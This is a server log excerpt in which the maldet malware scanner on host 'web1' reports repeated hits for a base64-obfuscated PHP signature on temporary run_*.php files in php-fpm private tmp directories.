Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db4ac9c6cb.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d727f670fa.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d72765a8fc.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db48cdf792.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52b3985e7.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db63e1c3e2.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d736a32418.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df6737e406.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d72ac3d2f7.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d7286b9722.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d73761441f.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d72c4d71b1.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df729ed4cf.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d93fd1e085.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd644f1316.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d93ee48d62.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d3488c463b.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d93e0990db.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d7359a54c1.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd767c1f6a.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df6839d479.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd770d27b9.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df5fb8122d.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e17f9d0218.php
Jan 07 2026 04:07:08 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e16b877c9f.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db634a612a.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e18de4b4f1.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d93b8986ef.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51f33a877.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52a3e2b71.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d528a9de5a.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd589732fa.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e1706095b5.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d9379d9e15.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d345b9bcd0.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db6739f634.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d31c15cf33.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52abd88c4.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e18fa2b30c.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd50db7209.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d327078ad3.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d313369b0d.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d34e26fff8.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e1741d5d71.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df63811c73.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df6462fc39.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db49e7a667.php
Jan 07 2026 04:07:09 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51f9415dc.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d7370c3106.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e16c8ef566.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db5737aa00.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d93d2eeea3.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e17140cb8f.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd75e57547.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e17dd611be.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d95ca0ffd6.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e17ebca40b.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd779cafa9.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d959eaa0de.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df5ec23b10.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51a8dddf5.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df5dc05eb2.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db66bb98bf.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e16aa131f7.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51dde6c6d.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db43a6bb2e.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db4c6aaeda.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db4b9eae7b.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd51d1434a.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d3472d27cc.php
Jan 07 2026 04:07:10 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d72be931ce.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e183cbbdae.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e174fccf44.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df70dedca2.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52853cbff.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df81ab909e.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd661cc041.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52b0d839a.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d10eee97e3.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf14b2faec.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cefd8a78dd.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d1364dee84.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d11946a9ae.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cefb3f1378.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d12394fe7c.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d100105954.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d11550ab73.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cef9fb3d79.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf176c18d2.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d1173b4d22.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf136b42b7.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d10d883c91.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d110815a5b.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d104727862.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf0c1e9f38.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d137286742.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf0abc8815.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d102c39ba0.php
Jan 07 2026 04:07:11 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cef4b06c4c.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d12565f598.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cefc6377ca.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d10ae51dae.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cef1f43193.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695d10c46b25c.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf11095903.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ceffbd420b.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf124116a0.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cef3606f29.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cf15e2e72a.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df7cd54ab2.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d52a72eaa3.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd55a2c045.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db58cc67cc.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d528fcc71d.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e1732627ac.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df825577e3.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695db62b86978.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d95b1b0eeb.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695df6640d68b.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695dd782aee0e.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695d51be17767.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e17235fd53.php
Jan 07 2026 04:07:12 web1 maldet(306726): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-Ehyvkb/tmp/run_695e182f3d727.php
